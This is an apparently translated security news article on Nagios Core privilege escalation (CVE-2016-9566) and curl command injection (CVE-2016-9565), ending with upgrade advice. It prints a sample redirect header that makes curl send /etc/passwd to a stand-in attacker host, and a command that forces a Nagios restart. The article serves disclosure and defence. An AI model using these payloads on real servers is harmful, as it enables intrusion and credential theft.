Vulnerability in Nagios monitoring system allows privilege escalation

Information security researcher David Golunski found a serious vulnerability in the popular Nagios IT infrastructure monitoring system. Its operation allows an attacker to achieve elevated privileges in the system.

What is the problem

The Nagios Core daemon of versions below 4.2.4 performs unsafe operations when processing a log file. This may result in the attacker being able to upgrade his privileges from the nagios system user in the nagios group to the root user. This leads to a complete compromise of the system on which the infrastructure monitoring software is installed.
')
The standard installation of Nagios Core creates a log directory with the following rights:

drwxrwsr-x 5 nagios nagios 

The researcher discovered that the Nagios daemon at system startup first opens the log file and then resets the root rights:

 8148 open("/usr/local/nagios/var/nagios.log", O_RDWR|O_CREAT|O_APPEND, 0666) = 4 8148 fcntl(4, F_SETFD, FD_CLOEXEC) = 0 8148 fchown(4, 1001, 1001) = 0 8148 getegid() = 0 8148 setgid(1001) = 0 8148 geteuid() = 0 [...] 

This means that if an attacker succeeds in gaining access to the 'nagios' account or another account from the 'nagios' group, he can replace the log file with a symlink with a random file in the system. Thus, it is possible to elevate privileges to root — for example, using a specially created /etc/ld.so.preload file .

By default, it will be created with the following nagios privileges:

 -rw-r--r-- 1 nagios nagios 950 Dec 10 11:56 /etc/ld.so.preload 

Thus, nagios has the right to write, but not members of the nagios group. However, there is a way to get write permissions for members of this group - for this, the attacker needs to exploit the CVE-2016-9565 vulnerability and an error in the operation of the Nagios command line module (nagios.cmd).

In order for new privileges to take effect, you need to restart Nagios - and the attacker can also provoke this action. To do this, you must send the SHUTDOWN_PROGRAM command via the system command interface.

 /usr/bin/printf "[%lu] SHUTDOWN_PROGRAM\n" `date +%s` > /usr/local/nagios/var/rw/nagios.cmd 

David Golunsky also developed a PoC-exploit that allows you to raise privileges in the system to the superuser.

CVE-2016-9565

In the version of Nagios 4.2.0, the vulnerability CVE-2008-4796 in the MagpieRSS component was fixed, allowing the insertion of arbitrary commands as parameters to the curl command. However, this fix remained vulnerable to the use of double quotes - this new vulnerability received the number CVE-2016-9565 and was finally fixed only in version 4.2.2.

The exploitation of the vulnerability consists in changing the internal variable $ URI in the _httpsrequest function of the vulnerable component when an RSS feed is requested by the local Nagios Core server. In different versions of the system, the RSS feed may be automatically loaded upon login. To conduct an attack, the attacker must impersonate www.nagios.org , for example, using DNS spoofing or ARP poisoning techniques. It is worth noting that this attack can acquire enormous proportions when this domain is compromised on the scale of large ISP DNS resolvers. Then, after a successful compromise, the attacker waits for the RSS feed request and responds with HTTP 302 Redirect, with the Location field containing the parameters for curl. For example, it might look like this:

 Location: https://attackers-host/get-data.php -Fpasswd=@/etc/passwd 

Thus, an attacker can execute arbitrary commands on the local Nagios server, and then use the CVE-2016-9566 vulnerability to increase local privileges.

It is important to note that among the parameters for curl, the argument “-k” is mentioned, which disables the SSL certificate verification, which also facilitates the attacker's task.

How to protect

The fixes for vulnerabilities CVE-2016-9565 and CVE-2016-9566 appeared in versions 4.2.2 and 4.2.4, respectively, therefore, administrators of Nagios servers are strongly recommended to upgrade to the latest version of Nagios.

Positive Technologies experts also developed an IDS signature for detecting attempts to exploit CVE-2008-4796 and CVE-2016-9565 vulnerabilities, publicly available on GitHub and Twitter:

#Nagios Core Curl Command Injection / #RCE
CVE-2016-9565
Affected: <4.2.2 #Suricata rules: https://t.co/vkidBDy3cN

- Attack Detection (@AttackDetection) December 20, 2016